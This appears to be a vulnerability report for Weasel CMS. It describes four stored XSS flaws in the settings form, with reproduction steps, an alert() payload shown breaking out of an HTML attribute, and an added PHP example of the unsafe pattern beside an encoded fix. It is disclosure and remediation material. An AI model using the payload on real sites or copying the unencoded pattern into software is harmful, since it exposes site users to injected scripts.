There are 4 XSS vulnerabilities.

1. Load index.php.
2. Sign in and select "SETTINGS".
3. Insert the payload `'"()/ ><ScRiPt >alert(0)</ScRiPt>//` in the Site Language/Site Title/Site Description/Site Keywords and submit.
4. Open index.php, line 376:
```html
<section class="column-one-third sidebar">
  <h2><i class="fa fa-cog fa-fw"></i> Settings</h2>
  <form method="POST" action="/cms/weasel/index.php">

    <p>
      <label for="site-language">
        <span><i class="fa fa-globe fa-fw"></i> Site Language <small>( 2 letter i.e: ES, EN )</small></span>
        <input type="text" name="site-language" id="site-language" value="'"()/ ><ScRiPt >alert(0)</ScRiPt>//" />
      </label>
    </p>
    <p>
      <label for="site-title">
        <span><i class="fa fa-font fa-fw"></i> Site Title</span>
        <input type="text" name="site-title" id="site-title" value="Weasel CMS" />
      </label>
    </p>
    <p>
      <label for="site-description">
        <span><i class="fa fa-align-left fa-fw"></i> Site Description</span>
        <input type="text" name="site-description" id="site-description" value="Open Source, very simple and lightweight flat file Content Management System written in PHP and built specifically for small websites." />
      </label>
    </p>
    <p>
      <label for="site-keywords">
        <span><i class="fa fa-tags fa-fw"></i> Site Keywords <small>( Comma separated values )</small></span>
        <input type="text" name="site-keywords" id="site-keywords" value="Weasel, WeaselCMS, PHP, CMS, Simple, lightweight, small, easy, Minimal" />
      </label>
    </p>
    <p>
      <label for="site-theme">
        <span><i class="fa fa-paint-brush fa-fw"></i> Theme</span>
        <select name="site-theme" id="site-theme">
          <option value="weasel">weasel</option><option value="weasel-dark" selected=selected>weasel-dark</option>
        </select>
      </label>
    </p>
    <p>
      <input type="submit" name="settings-submit" id="settings-submit" class="button-main" value="Save Settings" />
    </p>
  </form>
</section>
```
d13ff92
Thanks for reporting this @SkyZhang47
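
The markup in the report shows the stored setting written into `value="..."` without encoding. The following is an added example, not part of the original issue and not Weasel CMS code: it puts that pattern beside an attribute-encoded version and adds an input check for the 2-letter language field. The helper names (`attr`, `render_input_unsafe`, `render_input_safe`, `normalize_language`) and the `EN` fallback are assumptions.

```php
<?php
// Added example: hypothetical helpers, not taken from the Weasel CMS source.

// Encode a value for use inside a quoted HTML attribute.
function attr(string $value): string
{
    // ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
    // sequences instead of making the function return an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Pattern seen in the report: the stored setting is concatenated as-is,
// so a quote in the value ends the attribute and the rest is parsed as markup.
function render_input_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" id="' . $name
         . '" value="' . $value . '" />';
}

// Hardened pattern: every dynamic part is attribute-encoded at output time.
function render_input_safe(string $name, string $value): string
{
    $n = attr($name);
    return '<input type="text" name="' . $n . '" id="' . $n
         . '" value="' . attr($value) . '" />';
}

// Input-side check for the language field, which the form describes as a
// 2-letter code (ES, EN). Anything else falls back to an assumed default.
function normalize_language(string $raw, string $fallback = 'EN'): string
{
    $raw = trim($raw);
    return preg_match('/\A[A-Za-z]{2}\z/', $raw) === 1 ? $raw : $fallback;
}

// The string from the report, standing in for a stored setting value.
$stored = '\'"()/ ><ScRiPt >alert(0)</ScRiPt>//';

echo render_input_unsafe('site-title', $stored), "\n"; // attribute is broken out of
echo render_input_safe('site-title', $stored), "\n";   // value stays inside the attribute
echo normalize_language($stored), "\n";                // rejected, fallback used
echo normalize_language('ES'), "\n";                   // accepted unchanged
```

Encoding at output covers all four fields regardless of what is already stored in the settings file; the input check only narrows what the language field will accept.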